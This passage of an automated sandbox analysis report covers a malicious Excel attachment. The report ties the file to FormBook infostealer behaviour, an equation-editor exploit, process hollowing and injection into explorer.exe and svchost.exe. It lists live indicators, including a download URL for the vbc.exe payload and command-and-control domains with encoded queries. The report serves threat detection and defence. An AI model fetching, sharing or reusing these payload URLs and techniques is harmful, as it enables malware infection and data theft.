Source: explorer.exe, 00000008.00000000.487921894.0000000000750000.00000002.00020000.sdmp, svchost.exe, 00000009.00000002.682273930.0000000003010000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000008.00000000.487921894.0000000000750000.00000002.00020000.sdmp, svchost.exe, 00000009.00000002.682273930.0000000003010000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.513518262.0000000000330000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.513195165.0000000000130000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.503060559.000000000968B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.478266756.0000000003429000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.681191038.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.681249318.0000000000150000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.681218220.0000000000120000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.494897496.000000000968B000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.513518262.0000000000330000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.513195165.0000000000130000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.503060559.000000000968B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.478266756.0000000003429000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.681191038.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.681249318.0000000000150000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.681218220.0000000000120000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.494897496.000000000968B000.00000040.00020000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 483666 Sample: COAU7229898130.xlsx Startdate: 15/09/2021 Architecture: WINDOWS Score: 100 50 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 17 other signatures 2->56 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 34 44 2->15         started        process3 dnsIp4 44 103.133.106.199, 49165, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 10->44 32 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 10->32 dropped 34 C:\Users\Public\vbc.exe, PE32 10->34 dropped 74 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->74 17 vbc.exe 10->17         started        36 C:\Users\user\Desktop\~$COAU7229898130.xlsx, data 15->36 dropped file5 signatures6 process7 signatures8 46 Tries to detect virtualization through RDTSC time measurements 17->46 48 Injects a PE file into a foreign processes 17->48 20 vbc.exe 17->20         started        process9 signatures10 58 Modifies the context of a thread in another process (thread injection) 20->58 60 Maps a DLL or memory area into another process 20->60 62 Sample uses process hollowing technique 20->62 64 Queues an APC in another process (thread injection) 20->64 23 explorer.exe 20->23 injected process11 dnsIp12 38 tiaozhuan.zhuanye301.cn 154.91.1.126, 49166, 80 HKBN-AS-APHKBroadbandNetworkLtdHK Seychelles 23->38 40 www.thvsjwjvy.icu 47.91.170.222, 49167, 80 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC United States 23->40 42 7 other IPs or domains 23->42 66 System process connects to network (likely due to code injection or exploit) 23->66 27 svchost.exe 23->27         started        signatures13 process14 signatures15 68 Modifies the context of a thread in another process (thread injection) 27->68 70 Maps a DLL or memory area into another process 27->70 72 Tries to detect virtualization through RDTSC time measurements 27->72 30 cmd.exe 27->30         started        process16
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
103.133.106.199
 unknown Viet Nam
135905 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN true
192.0.78.25
 absolutalibertas.com United States
2635 AUTOMATTICUS true
34.102.136.180
 biotechfla.com United States
15169 GOOGLEUS false
154.91.1.126
 tiaozhuan.zhuanye301.cn Seychelles
10103 HKBN-AS-APHKBroadbandNetworkLtdHK true
47.91.170.222
 www.thvsjwjvy.icu United States
45102 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC true

Contacted Domains

Name IP Active
www.thvsjwjvy.icu 47.91.170.222 true
biotechfla.com 34.102.136.180 true
absolutalibertas.com 192.0.78.25 true
tiaozhuan.zhuanye301.cn 154.91.1.126 true
www.359326.com unknown unknown
www.absolutalibertas.com unknown unknown
www.carlsbadbeachwear.com unknown unknown
www.crownfoamus.com unknown unknown
www.biotechfla.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.thvsjwjvy.icu/imi7/?8pGdYd7=JylIKvNk78hOFd+1TnqK+cq4SLeKYXMs9BOMQrcpY54MEXf7zcD8i4BM8h1sFc+7G7xGrw==&edrh=onDxIjzxvz true
  • Avira URL Cloud: safe
 unknown
http://www.biotechfla.com/imi7/?8pGdYd7=nnh6Wn4YtMnGcYcsMkPyBnKFlLVF5md1d8S2Q13SdHwJLrOdJeCsdNPQR8GZEfRmALPZ9A==&edrh=onDxIjzxvz false
  • Avira URL Cloud: safe
 unknown
www.southerngiggle.com/imi7/ true
  • Avira URL Cloud: safe
 low
http://www.absolutalibertas.com/imi7/?8pGdYd7=v4OPSvG6dxhfjDw6HF6SnM8N8NyagVc5G1UDhWfJc2g0yYxGB1DXDxzdmmmhzDSPz7MbqA==&edrh=onDxIjzxvz true
  • Avira URL Cloud: safe
 unknown
http://103.133.106.199/rbi/vbc.exe true
  • Avira URL Cloud: malware
 unknown